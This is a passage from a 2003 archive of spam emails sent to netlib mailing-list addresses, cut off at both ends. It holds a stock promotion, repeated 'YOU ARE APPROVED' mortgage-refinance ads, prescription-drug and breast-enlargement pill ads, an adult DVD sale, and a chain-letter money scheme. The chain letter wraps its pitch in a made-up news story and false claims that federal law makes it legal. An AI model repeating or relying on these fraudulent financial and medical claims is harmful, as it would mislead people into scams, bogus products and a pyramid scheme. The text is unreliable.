ment 
to over 270 of its facilities.<br>
<br>
3) SureQuest announces that it has been approved as a vendor for the state=
 of 
Texas. SureQuest has now been approved to bid on contacts in one of the la=
rgest 
and most populated states in the nation.<br>
<br>
So you can see, SureQuest <b>SUQU</b> is not only aware of the problems as=
sociated with 
out-dated methods in its industry, it has the solutions and is well on the=
 way 
to implementing them.</p>x jtofcopgv nf mc

--0_.8E4A4_7EA9.07_--


From b819ghz@hotmail.com Sat Sep  6 00:00:11 2003
Return-Path: <b819ghz@hotmail.com>
Received: from dhcp16488196.woh.rr.com (dhcp16488196.woh.rr.com [24.164.88.196])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h863xLRY028788;
	Fri, 5 Sep 2003 23:59:51 -0400 (EDT)
Received: from [93.69.146.65] by dhcp16488196.woh.rr.com; Sat, 06 Sep 2003 19:53:55 +0200
Message-ID: <q-5l$o$$$-6q$y@l3qos4uu.19b>
From: "Kristin Madison" <b819ghz@hotmail.com>
Reply-To: "Kristin Madison" <b819ghz@hotmail.com>
To: 199902071506.kaa20808@netlib2.cs.utk.edu
Cc: <anon@netlib2.cs.utk.edu>, <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-parallel-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Refinance   p
Date: Sat, 06 Sep 03 19:53:55 GMT
X-Mailer: Microsoft Outlook Express 5.00.2615.200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="1F_F3FD.2D0C"
X-Priority: 1
X-MSMail-Priority: High


--1F_F3FD.2D0C
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html><head><title>Click Here To Complete The Form MORTGAGE RATES ARE STIL=
L DOWN</title></head><body><table class=3D"MsoNormalTable" style=3D"width:=
 430px; border-collapse: collapse" borderColor=3D"#111111" cellSpacing=3D"=
0" cellPadding=3D"0" border=3D"0"><tr><td style=3D"width: 100=
%; padding: 0in; background: black" bgColor=3D"black"><p style=3D"text-ali=
gn: center" align=3D"center"><b><font face=3D"Arial" color=3D"blue"
size=3D=
"5"><span style=3D"font-weight: bold; font-size: 18pt; color: blue; font-f=
amily: Arial"><a style=3D"color: #ffffff; text-decoration: underline" href=
=3D"http://globalimarket.pro.br/L05/index.html">Click Here To Complete The=
 Form</a></span></font><font face=3D"Century Gothic" color=3D"red" size=3D=
"5"><span style=3D"font-weight: bold; font-size: 18pt; color: red; font-fa=
mily: Century Gothic"><br></span></font></b><font color=3D"#ffff00"
size=3D=
"4"><span style=3D"font-weight: 700; font-family: Century Gothic">MORTGAGE=
 RATES ARE STILL DOWN!<br>Currently as low as 2.75% for 30 Year Fixed term=
</span></font></td></tr><tr><td style=3D"width: 100%; padding: 0in; backgr=
ound: yellow" bgColor=3D"yellow"><p style=3D"text-align: center" align=3D"=
center"><b><font face=3D"Impact"><span style=3D"font-weight: bold; font-fa=
mily: Arial"><br><font size=3D"5">YOU ARE APPROVED</font><br></span></font=
><font size=3D"5"><span style=3D"font-weight: bold; font-size: 18pt">Refin=
ancing, <br>Debt Consolidation<br>New Purchases,<br></span></font><font fa=
ce=3D"Impact" color=3D"white"><span style=3D"font-weight: bold; color: whi=
te; font-family: Impact">&nbsp;</span></font><font size=3D"5"><span
style=3D=
"font-weight: bold; font-size: 18pt">Commercial Loans </span></font></b></=
p><p style=3D"text-align: center" align=3D"center"><b><font face=3D"Arial"=
 color=3D"blue" size=3D"5"><span style=3D"font-weight: bold; font-size: 18=
pt; color: blue; font-family: Arial"><a style=3D"color: blue; text-decorat=
ion: underline" href=3D"http://globalimarket.pro.br/L05/index.html">Click =
Here To Complete The Form</a></span></font></b><br><br><br>&nbsp;<font siz=
e=3D"+0" face=3D"Arial"><span class=3D"523274616-09042003"><span class=3D"=
075274516-09042003"></span></span></font></td></tr></table><p><font
face=3D=
"Times New Roman" size=3D"2"><span style=3D"font-size: 10pt">If you would =
prefer to not receive these messages in the future, please&nbsp; </span></=
font><font color=3D"#3366cc"><span style=3D"color: #3366cc"><a style=3D"co=
lor: blue; text-decoration: underline" href=3D"http://zenmail2003.com/?aaa=
dac.aan1mo.aabm1p.aaaaac.aaaaaa.199902071506.kaa20808@netlib2.cs.utk.edu">Click Here</a></span></font></p=
><td width=3D"188" align=3D"right"><font face=3D"Arial, Helvetica, sans-se=
rif"><b><font color=3D"#000000" size=3D"1"></font></b></font></td><td widt=
h=3D"12">&nbsp;</td></body></html>l y   bhvolyi cr iiegoqhcbyoqoj  xhuzphhiekkzzr

--1F_F3FD.2D0C--


From auh0pko@earthlink.com Sat Sep  6 03:29:55 2003
Return-Path: <auh0pko@earthlink.com>
Received: from 160.36.58.108 ([211.109.237.67])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h867TRRY011630;
	Sat, 6 Sep 2003 03:29:34 -0400 (EDT)
Received: from (HELO n6x) [218.114.90.217] by 160.36.58.108 with ESMTP id 70024291; Sat, 06 Sep 2003 16:25:33 -0400
Message-ID: <0--v5x-94n2b1@ek2.n4s.f1>
From: "Vanessa Cullen" <auh0pko@earthlink.com>
Reply-To: "Vanessa Cullen" <auh0pko@earthlink.com>
To: 199902071506.kaa20808@netlib2.cs.utk.edu
Cc: <anon@netlib2.cs.utk.edu>, <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-parallel-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>, <netlibd@netlib2.cs.utk.edu>
Subject: We help you find the best rate   nqjimakaypzsayc x
Date: Sat, 06 Sep 03 16:25:33 GMT
X-Mailer: eGroups Message Poster
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="EBBE7BF8.._F1D"
X-Priority: 1
X-MSMail-Priority: High


--EBBE7BF8.._F1D
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html><head><title>Click Here To Complete The Form MORTGAGE RATES ARE STIL=
L DOWN</title></head><body><table class=3D"MsoNormalTable" style=3D"width:=
 430px; border-collapse: collapse" borderColor=3D"#111111" cellSpacing=3D"=
0" cellPadding=3D"0" border=3D"0"><tr><td style=3D"width: 100=
%; padding: 0in; background: black" bgColor=3D"black"><p style=3D"text-ali=
gn: center" align=3D"center"><b><font face=3D"Arial" color=3D"blue"
size=3D=
"5"><span style=3D"font-weight: bold; font-size: 18pt; color: blue; font-f=
amily: Arial"><a style=3D"color: #ffffff; text-decoration: underline" href=
=3D"http://globalimarket.pro.br/L05/index.html">Click Here To Complete The=
 Form</a></span></font><font face=3D"Century Gothic" color=3D"red" size=3D=
"5"><span style=3D"font-weight: bold; font-size: 18pt; color: red; font-fa=
mily: Century Gothic"><br></span></font></b><font color=3D"#ffff00"
size=3D=
"4"><span style=3D"font-weight: 700; font-family: Century Gothic">MORTGAGE=
 RATES ARE STILL DOWN!<br>Currently as low as 2.75% for 30 Year Fixed term=
</span></font></td></tr><tr><td style=3D"width: 100%; padding: 0in; backgr=
ound: yellow" bgColor=3D"yellow"><p style=3D"text-align: center" align=3D"=
center"><b><font face=3D"Impact"><span style=3D"font-weight: bold; font-fa=
mily: Arial"><br><font size=3D"5">YOU ARE APPROVED</font><br></span></font=
><font size=3D"5"><span style=3D"font-weight: bold; font-size: 18pt">Refin=
ancing, <br>Debt Consolidation<br>New Purchases,<br></span></font><font fa=
ce=3D"Impact" color=3D"white"><span style=3D"font-weight: bold; color: whi=
te; font-family: Impact">&nbsp;</span></font><font size=3D"5"><span
style=3D=
"font-weight: bold; font-size: 18pt">Commercial Loans </span></font></b></=
p><p style=3D"text-align: center" align=3D"center"><b><font face=3D"Arial"=
 color=3D"blue" size=3D"5"><span style=3D"font-weight: bold; font-size: 18=
pt; color: blue; font-family: Arial"><a style=3D"color: blue; text-decorat=
ion: underline" href=3D"http://globalimarket.pro.br/L05/index.html">Click =
Here To Complete The Form</a></span></font></b><br><br><br>&nbsp;<font siz=
e=3D"+0" face=3D"Arial"><span class=3D"523274616-09042003"><span class=3D"=
075274516-09042003"></span></span></font></td></tr></table><p><font
face=3D=
"Times New Roman" size=3D"2"><span style=3D"font-size: 10pt">If you would =
prefer to not receive these messages in the future, please&nbsp; </span></=
font><font color=3D"#3366cc"><span style=3D"color: #3366cc"><a style=3D"co=
lor: blue; text-decoration: underline" href=3D"http://zenmail2003.com/?aaa=
dac.aan1mo.aabm1p.aaaaac.aaaaaa.199902071506.kaa20808@netlib2.cs.utk.edu">Click Here</a></span></font></p=
><td width=3D"188" align=3D"right"><font face=3D"Arial, Helvetica, sans-se=
rif"><b><font color=3D"#000000" size=3D"1"></font></b></font></td><td widt=
h=3D"12">&nbsp;</td></body></html>vdbpagg yfwje rnbv afx
hxwhil catdquglh 

--EBBE7BF8.._F1D--


From mejkwd37e@verizon.net Sat Sep  6 13:01:38 2003
Return-Path: <mejkwd37e@verizon.net>
Received: from 160.36.58.108 (CacheFlowServer@[211.152.179.3])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h86H1VRY018575;
	Sat, 6 Sep 2003 13:01:34 -0400 (EDT)
Received: from [208.123.237.124] by 160.36.58.108 SMTP id x9UyJ47ja09Ofa; Sun, 07 Sep 2003 06:51:26 +0000
Message-ID: <43$ac-1g$-$-3$c-f-49vb5--u7@3dda.2.d79>
From: "George Shepard" <mejkwd37e@verizon.net>
Reply-To: "George Shepard" <mejkwd37e@verizon.net>
To: 199902071506.kaa20808@netlib2.cs.utk.edu
Cc: <anon@netlib2.cs.utk.edu>, <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-parallel-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Fixed Rate Cash Out Second Mortgage Loan   emm
Date: Sun, 07 Sep 03 06:51:26 GMT
X-Mailer: QUALCOMM Windows Eudora Version 5.1
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="F9F133AEC0C0.CD7.__3F"
X-Priority: 1
X-MSMail-Priority: High


--F9F133AEC0C0.CD7.__3F
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html><head><title>Click Here To Complete The Form MORTGAGE RATES ARE STIL=
L DOWN</title></head><body><table class=3D"MsoNormalTable" style=3D"width:=
 430px; border-collapse: collapse" borderColor=3D"#111111" cellSpacing=3D"=
0" cellPadding=3D"0" border=3D"0"><tr><td style=3D"width: 100=
%; padding: 0in; background: black" bgColor=3D"black"><p style=3D"text-ali=
gn: center" align=3D"center"><b><font face=3D"Arial" color=3D"blue"
size=3D=
"5"><span style=3D"font-weight: bold; font-size: 18pt; color: blue; font-f=
amily: Arial"><a style=3D"color: #ffffff; text-decoration: underline" href=
=3D"http://globalimarket.pro.br/L05/index.html">Click Here To Complete The=
 Form</a></span></font><font face=3D"Century Gothic" color=3D"red" size=3D=
"5"><span style=3D"font-weight: bold; font-size: 18pt; color: red; font-fa=
mily: Century Gothic"><br></span></font></b><font color=3D"#ffff00"
size=3D=
"4"><span style=3D"font-weight: 700; font-family: Century Gothic">MORTGAGE=
 RATES ARE STILL DOWN!<br>Currently as low as 2.75% for 30 Year Fixed term=
</span></font></td></tr><tr><td style=3D"width: 100%; padding: 0in; backgr=
ound: yellow" bgColor=3D"yellow"><p style=3D"text-align: center" align=3D"=
center"><b><font face=3D"Impact"><span style=3D"font-weight: bold; font-fa=
mily: Arial"><br><font size=3D"5">YOU ARE APPROVED</font><br></span></font=
><font size=3D"5"><span style=3D"font-weight: bold; font-size: 18pt">Refin=
ancing, <br>Debt Consolidation<br>New Purchases,<br></span></font><font fa=
ce=3D"Impact" color=3D"white"><span style=3D"font-weight: bold; color: whi=
te; font-family: Impact">&nbsp;</span></font><font size=3D"5"><span
style=3D=
"font-weight: bold; font-size: 18pt">Commercial Loans </span></font></b></=
p><p style=3D"text-align: center" align=3D"center"><b><font face=3D"Arial"=
 color=3D"blue" size=3D"5"><span style=3D"font-weight: bold; font-size: 18=
pt; color: blue; font-family: Arial"><a style=3D"color: blue; text-decorat=
ion: underline" href=3D"http://globalimarket.pro.br/L05/index.html">Click =
Here To Complete The Form</a></span></font></b><br><br><br>&nbsp;<font siz=
e=3D"+0" face=3D"Arial"><span class=3D"523274616-09042003"><span class=3D"=
075274516-09042003"></span></span></font></td></tr></table><p><font
face=3D=
"Times New Roman" size=3D"2"><span style=3D"font-size: 10pt">If you would =
prefer to not receive these messages in the future, please&nbsp; </span></=
font><font color=3D"#3366cc"><span style=3D"color: #3366cc"><a style=3D"co=
lor: blue; text-decoration: underline" href=3D"http://zenmail2003.com/?aaa=
dac.aan1mo.aabm1p.aaaaac.aaaaaa.199902071506.kaa20808@netlib2.cs.utk.edu">Click Here</a></span></font></p=
><td width=3D"188" align=3D"right"><font face=3D"Arial, Helvetica, sans-se=
rif"><b><font color=3D"#000000" size=3D"1"></font></b></font></td><td widt=
h=3D"12">&nbsp;</td></body></html>vg j vzkx vw wedbqq
nl itvekfehtsovyup w
hwrskjfwcjci
yyqj

--F9F133AEC0C0.CD7.__3F--


From jhxlz15te@juno.com Sat Sep  6 14:45:41 2003
Return-Path: <jhxlz15te@juno.com>
Received: from 160.36.58.108 (CacheFlowServer@[61.159.235.36])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h86IjORY022613;
	Sat, 6 Sep 2003 14:45:31 -0400 (EDT)
Received: from [45.39.196.89]
	by 160.36.58.108 id meRa7mh4572K;
	Sun, 07 Sep 2003 02:47:26 -0500
Message-ID: <7rxj-9etyv141n165-1co-i1176a53@br6.d03wl>
From: "Joe Archer" <jhxlz15te@juno.com>
Reply-To: "Joe Archer" <jhxlz15te@juno.com>
To: 199902071506.kaa20808@netlib2.cs.utk.edu
Cc: <anon@netlib2.cs.utk.edu>, <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>
Subject: Save in a poor economy   addbnb 
Date: Sun, 07 Sep 03 02:47:26 GMT
X-Mailer: Microsoft Outlook Express 5.00.2615.200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="DB8EBAAC674"
X-Priority: 1
X-MSMail-Priority: High


--DB8EBAAC674
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html><head><title>Click Here To Complete The Form MORTGAGE RATES ARE STIL=
L DOWN</title></head><body><table class=3D"MsoNormalTable" style=3D"width:=
 430px; border-collapse: collapse" borderColor=3D"#111111" cellSpacing=3D"=
0" cellPadding=3D"0" border=3D"0"><tr><td style=3D"width: 100=
%; padding: 0in; background: black" bgColor=3D"black"><p style=3D"text-ali=
gn: center" align=3D"center"><b><font face=3D"Arial" color=3D"blue"
size=3D=
"5"><span style=3D"font-weight: bold; font-size: 18pt; color: blue; font-f=
amily: Arial"><a style=3D"color: #ffffff; text-decoration: underline" href=
=3D"http://globalimarket.pro.br/L05/index.html">Click Here To Complete The=
 Form</a></span></font><font face=3D"Century Gothic" color=3D"red" size=3D=
"5"><span style=3D"font-weight: bold; font-size: 18pt; color: red; font-fa=
mily: Century Gothic"><br></span></font></b><font color=3D"#ffff00"
size=3D=
"4"><span style=3D"font-weight: 700; font-family: Century Gothic">MORTGAGE=
 RATES ARE STILL DOWN!<br>Currently as low as 2.75% for 30 Year Fixed term=
</span></font></td></tr><tr><td style=3D"width: 100%; padding: 0in; backgr=
ound: yellow" bgColor=3D"yellow"><p style=3D"text-align: center" align=3D"=
center"><b><font face=3D"Impact"><span style=3D"font-weight: bold; font-fa=
mily: Arial"><br><font size=3D"5">YOU ARE APPROVED</font><br></span></font=
><font size=3D"5"><span style=3D"font-weight: bold; font-size: 18pt">Refin=
ancing, <br>Debt Consolidation<br>New Purchases,<br></span></font><font fa=
ce=3D"Impact" color=3D"white"><span style=3D"font-weight: bold; color: whi=
te; font-family: Impact">&nbsp;</span></font><font size=3D"5"><span
style=3D=
"font-weight: bold; font-size: 18pt">Commercial Loans </span></font></b></=
p><p style=3D"text-align: center" align=3D"center"><b><font face=3D"Arial"=
 color=3D"blue" size=3D"5"><span style=3D"font-weight: bold; font-size: 18=
pt; color: blue; font-family: Arial"><a style=3D"color: blue; text-decorat=
ion: underline" href=3D"http://globalimarket.pro.br/L05/index.html">Click =
Here To Complete The Form</a></span></font></b><br><br><br>&nbsp;<font siz=
e=3D"+0" face=3D"Arial"><span class=3D"523274616-09042003"><span class=3D"=
075274516-09042003"></span></span></font></td></tr></table><p><font
face=3D=
"Times New Roman" size=3D"2"><span style=3D"font-size: 10pt">If you would =
prefer to not receive these messages in the future, please&nbsp; </span></=
font><font color=3D"#3366cc"><span style=3D"color: #3366cc"><a style=3D"co=
lor: blue; text-decoration: underline" href=3D"http://zenmail2003.com/?aaa=
dac.aan1mo.aabm1p.aaaaac.aaaaaa.199902071506.kaa20808@netlib2.cs.utk.edu">Click Here</a></span></font></p=
><td width=3D"188" align=3D"right"><font face=3D"Arial, Helvetica, sans-se=
rif"><b><font color=3D"#000000" size=3D"1"></font></b></font></td><td widt=
h=3D"12">&nbsp;</td></body></html>u kllymmj vgr
rkjyjqkmg ljqzn xx albrrmmm w 
wblzkfe k
cyeui

y
f asom drzgy
wjcbajlhucezf

--DB8EBAAC674--


From 1nemzor@yahoo.com Sun Sep  7 01:28:23 2003
Return-Path: <1nemzor@yahoo.com>
Received: from 160.36.58.108 ([210.183.159.135])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h875SIRY021653;
	Sun, 7 Sep 2003 01:28:20 -0400 (EDT)
Received: from [99.147.137.76] by 160.36.58.108 id 8NlCwEoIBJz5; Sun, 07 Sep 2003 11:21:11 +0500
Message-ID: <e99-c$bmqybw--rz@om5.7oe9k.1or>
From: "Christie Estes" <1nemzor@yahoo.com>
Reply-To: "Christie Estes" <1nemzor@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>
Subject: Blast-funct-archive  The Best Valiumm and Xanaxx aAmbiennutate
Date: Sun, 07 Sep 03 11:21:11 GMT
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="775._ADB3D_.29_E8C2._"
X-Priority: 3
X-MSMail-Priority: Normal


--775._ADB3D_.29_E8C2._
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<head>
</head>
<body>
<p align=3D"center"><a href=3D"http://executrix@www.pharmacene.com/l/10=
5/index.htm?quadrivium"><img border=3D"0" src=3D"http://smother@www=
pharmacene.com/l/images/2.gif?patristic"></a></p>
</body>
</html>




l un h
q le pu  saubybxmvm
ylani yki
xhfju
zjf  
 

--775._ADB3D_.29_E8C2._--


From zhol3vnaby@hotmail.com Mon Sep  8 00:34:32 2003
Return-Path: <zhol3vnaby@hotmail.com>
Received: from d47-69-102-12.col.wideopenwest.com (d47-69-102-12.col.wideopenwest.com [69.47.12.102])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h884YNRY021245
	for <blast-funct-archive@netlib2.cs.utk.edu>; Mon, 8 Sep 2003 00:34:29 -0400 (EDT)
Received: from [25.77.80.178] by d47-69-102-12.col.wideopenwest.com with SMTP for <blast-funct-archive@netlib2.cs.utk.edu>; Mon, 08 Sep 2003 13:34:17 -0700
Message-ID: <w$$$4f--2y$j24n-l@e4p92.tyd>
From: "Ella Foote" <zhol3vnaby@hotmail.com>
Reply-To: "Ella Foote" <zhol3vnaby@hotmail.com>
To: <blast-funct-archive@netlib2.cs.utk.edu>
Subject: Herbal breast pills mu y
Date: Mon, 08 Sep 03 13:34:17 GMT
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="FAC_B81C4.B6FE._F5E0B"
X-Priority: 3
X-MSMail-Priority: Normal


--FAC_B81C4.B6FE._F5E0B
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

Blast-funct-archive
<div align=3D"center"><font face=3D"Helvetica, Arial, sans-serif"><font si=
ze=3D"+3" >Increase
Your Breasts!!</font><p><b>NATURAL BRE<jjj>AST ENLA<jjj>RGEME<jjj>NT PILLS=
!</b><p>
<font color=3D"#ff0000" size=3D"+1"><b>GAIN 3 CUP SIZES IN A MATTER OF WEE=
KS!
<br>
<font size=3D"+3" color=3D"#3333ff">GUARA<jjj>NTEED!!</font></b></font><p>=

SPECIAL DEAL TODAY!! ORD<jjj>ER 2 AND GET 1 FR<jjj>EE!!!<p>
<font size=3D"+3" face=3D"Helvetica"><a
 href=3D"http://www.buyy.biz/breast/">ENTER HERE FOR <br>
BREAST PILLS</a></font>
</font><br><br><br><br><br></div></font><a href=3Dhttp://www.buyy.biz/remo=
ve.html>Re<jjj>move</a> Your email perminantly from our lists!
ipxrf sveywxaomafwlfs

--FAC_B81C4.B6FE._F5E0B--


From d857nlse@xyth.demon.co.uk Tue Sep  9 18:30:22 2003
Return-Path: <d857nlse@xyth.demon.co.uk>
Received: from adsl-68-20-106-57.dsl.sfldmi.ameritech.net (adsl-68-20-106-57.dsl.sfldmi.ameritech.net [68.20.106.57])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h89MUKRY023397
	for <blast-funct-archive@netlib2.cs.utk.edu>; Tue, 9 Sep 2003 18:30:22 -0400 (EDT)
Received: from [226.129.250.22] by adsl-68-20-106-57.dsl.sfldmi.ameritech.net with ESMTP id 8460C90C0AD; Tue, 09 Sep 2003 04:22:51 -0700
Message-ID: <h4583-6u5$$y@1h0f55hmj>
From: "Darrin Dubois" <d857nlse@xyth.demon.co.uk>
Reply-To: "Darrin Dubois" <d857nlse@xyth.demon.co.uk>
To: <blast-funct-archive@netlib2.cs.utk.edu>
Subject: Blast-funct-archive, DVD LIQUIDATION - ADULT aafmxxwcogmqivfdsc
Date: Tue, 09 Sep 03 04:22:51 GMT
X-Mailer: Internet Mail Service (5.5.2650.21)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="E3D04AB8_._EC"
X-Priority: 3
X-MSMail-Priority: Normal


--E3D04AB8_._EC
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

ADULT DVD LIQUIDATION
BARGAIN BASEMENT PRICES

Over 100 Adult Titles - $3000 retail value

First $500 Takes all 

Perfect for starting your own private collection or reselling through flea=
 markets or Ebay!

Guaranteed To Be Brand New in original packaging, 2-4 hours per DVD, No Du=
plicate Titles

Call 1-305-468-6390 (Leave Message)

----------------------------------------
This is a one time message, you will not
be contacted by us again
----------------------------------------


v  opy f vhqgwkpbl edu
plrl cp a
o  hvdssiepehq  t

--E3D04AB8_._EC--


From ipgwcset29@vale.demon.co.uk Sat Sep 13 11:06:55 2003
Return-Path: <ipgwcset29@vale.demon.co.uk>
Received: from 160.36.58.108 ([211.175.109.232])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h8DF6pRY029418
	for <blast-funct-archive@netlib2.cs.utk.edu>; Sat, 13 Sep 2003 11:06:53 -0400 (EDT)
Received: from [245.222.177.69] by 160.36.58.108 SMTP id Hkz2QJI9359QDD for <blast-funct-archive@netlib2.cs.utk.edu>; Sat, 13 Sep 2003 16:01:55 +0000
Message-ID: <2--1vg3kea$5w$i4e163@3z9x1wz>
From: "Eloise Dwyer" <ipgwcset29@vale.demon.co.uk>
Reply-To: "Eloise Dwyer" <ipgwcset29@vale.demon.co.uk>
To: <blast-funct-archive@netlib2.cs.utk.edu>
Subject: AS SEEN ON NATIONAL TV zvkrcz
Date: Sat, 13 Sep 03 16:01:55 GMT
X-Mailer: QUALCOMM Windows Eudora Version 5.1
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="B.9A70C71AEDB1"
X-Priority: 3
X-MSMail-Priority: Normal


--B.9A70C71AEDB1
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
   <meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8=
859-1">
   <meta name=3D"GENERATOR" content=3D"Mozilla/4.77 [en] (Windows NT 5.0; =
U) [Netscape]">
   <title>P01</title>
</head>
<body text=3D"#000000" bgcolor=3D"#009900" link=3D"#0000EE" vlink=3D"#551A=
8B" alink=3D"#FF0000">
&nbsp;
<center><table CELLSPACING=3D0 WIDTH=3D"690" BGCOLOR=3D"#FFFFFF" class=3D"=
center" >
<tr>
<td class=3D"backImg">&nbsp;
<center>
<br><b><font face=3D"Arial">DO NOT DELETE THIS - <u>READ FIRST</u> - IT WI=
LL
CHANGE YOUR LIFE!</font></b>
<p><font face=3D"Arial"><font size=3D+2>This <b>Really Works</b>!</font></=
font>
<p><b><u><font face=3D"Arial"><font color=3D"#FF0000"><font size=3D+2>Give=
 Your
Future Five Minutes And Read This Email</font></font></font></u></b>
<p><b><u><font face=3D"Arial"><font color=3D"#FF0000"><font size=3D+2>It W=
ill
Change Your Life!</font></font></font></u></b>
<p><b><i><font face=3D"Arial">A One Time Investment Of $25 Plus This Simpl=
e
Technology</font></i></b>
<br><b><i><font face=3D"Arial">Could Make You Financially Secure For Life!=
</font></i></b></center>

<blockquote>
<center><font face=3D"Arial">Just Because <b>This&nbsp; Is Easy</b> doesn'=
t
mean it's not <b>Honest</b>, or <b>Real Business</b>.&nbsp; Keep&nbsp;</fo=
nt>
<br><font face=3D"Arial"><b>Working Hard</b> or Learn to <b>Work Smart</b>=
.
What do you think Successful People Do?</font></center>

<blockquote><font face=3D"Arial">This is a completely documented method to=

Get Wealthy and Anyone regardless of Age, Race, State of Health, Country
of origin, or Financial Standing can participate. No Education or Special
Experience is needed. Within the next two weeks you could be well on your
way to a $500,000.00 income. Imagine being able to make over a half millio=
n
dollars every 4 to 5 months from your home.</font></blockquote>

<center><b><font face=3D"Arial">THANK'S TO THE COMPUTER AGE AND THE INTERN=
ET</font></b>
<p><b><font face=3D"Arial"><font size=3D+1>AS SEEN ON NATIONAL TV:</font><=
/font></b></center>

<center><b><font face=3D"Arial">PARENTS OF 15 - YEAR OLD - FIND $71,000 CA=
SH
HIDDEN IN HIS CLOSET!</font></b></center>

<blockquote><font face=3D"Arial">Does this headline look familiar? Of cour=
se
it does. You most likely have just seen this story recently featured on
a major nightly news program (USA). And reported elsewhere in the world.
His mother was cleaning and putting laundry away when she came across a
large brown paper bag that was suspiciously buried beneath some clothes
and a skateboard in the back of her 15-year-old sons closet. Nothing could=

have prepared her for the shock she got when she opened the bag and found
it was full of cash. Five-Dollar Bills, Twenties, Fifties and Hundreds
- all neatly rubber-banded in labelled piles.</font>
<p><font face=3D"Arial">"My first thought was that he had robbed a bank",
says the 41-year-old woman, "There was over $71,000 Dollars in that bag
-- that's more than my husband earns in a year".</font>
<p><font face=3D"Arial">The woman immediately called her husband at the ca=
r-dealership
where he worked to tell him what she had discovered. He came home right
away, and they drove together to the boys school, and picked him up. Littl=
e
did they suspect that where the money came from, was more shocking than
actually finding it in the closet.</font>
<p><font face=3D"Arial">As it turns out, the boy had been sending out, via=

E-mail, a type of "Report" to E-mail addresses that he obtained off the
Internet. Everyday after school for the past 2 months, he had been doing
this right on his computer in his bedroom.</font>
<p><font face=3D"Arial">"I just got the E-mail one day and I figured what
the heck, I put my name on it like the instructions said and I started
sending it out", says the clever 15-year-old.</font>
<p><font face=3D"Arial">The E-mail letter listed 5 addresses and contained=

instructions to send one $5 dollar bill to each person on the list, then
delete the address at the bottom and move the others addresses Down , and
finally to add your name to the top of the list.</font>
<p><font face=3D"Arial">The letter goes on to state that you would receive=

Several Thousand Dollars in Five-Dollar Bills within 2 weeks if you sent
out the letter with your name at the top of the 5-address list. "I get
junk E-mail all the time, and really did not think it was going to work",
the boy continues.</font>
<p><font face=3D"Arial">Within the first few days of sending out the E-mai=
l,
the Post Office Box that his parents had gotten him for his video-game
magazine subscriptions began to fill up with not with magazines, but envel=
opes
containing $5 Bills.</font>
<p><font face=3D"Arial">"About a week later I rode [my bike] down to the
post office and my box had 1 magazine and about 300 envelops stuffed in
it. There was also a yellow slip that said I had to go up to the [post
office] counter. I thought I was in trouble or something (laughs)". He
goes on, "I went up to the counter and they had a whole box of more mail
for me. I had to ride back home and empty out my backpack because I could
not carry it all". Over the next few weeks, the boy continued sending out
the E-mail."The money just kept coming in and I just kept sorting it and
stashing it in the closet, barely had time for my homework".He had also
been riding his bike to several of the banks in his area and exchanging
the $5 bills for twenties, fifties and hundreds.</font>
<p><font face=3D"Arial">"I didn't want the banks to get suspicious so I ke=
pt
riding to different banks with like five thousand at a time in my backpack=
.
I would usually tell the lady at the bank counter that my dad had sent
me in to exchange the money and he was outside waiting for me.One time
the lady gave me a really strange look and told me that she would not be
able to do it for me and my dad would have to come in and do it, but I
just rode to the next bank down the street (laughs)." Surprisingly, the
boy did not have any reason to be afraid.The reporting news team examined
and investigated the so-called "chain-letter" the boy was sending out and
found that it was not a chain-letter at all.In fact, it was completely
legal according to US Postal and Lottery Laws, Title 18, Section 1302 and
1341, or Title 18, Section 3005 in the US code, also in the code of federa=
l
regulations, Volume 16, Sections 255 and 436, which state a product or
service must be exchanged for money received.</font>
<p><font face=3D"Arial">Every five-dollar bill that he received contained
a little note that read, "Please send me report number XYX".This simple
note made the letter legal because he was exchanging a service (A Report
on how-to) for a five-dollar fee.</font>
<p><font face=3D"Arial">[This is the end of the media release. If you woul=
d
like to understand how the system works and get your $71,000 plus - please=

continue reading. What appears below is what the 15 year old was sending
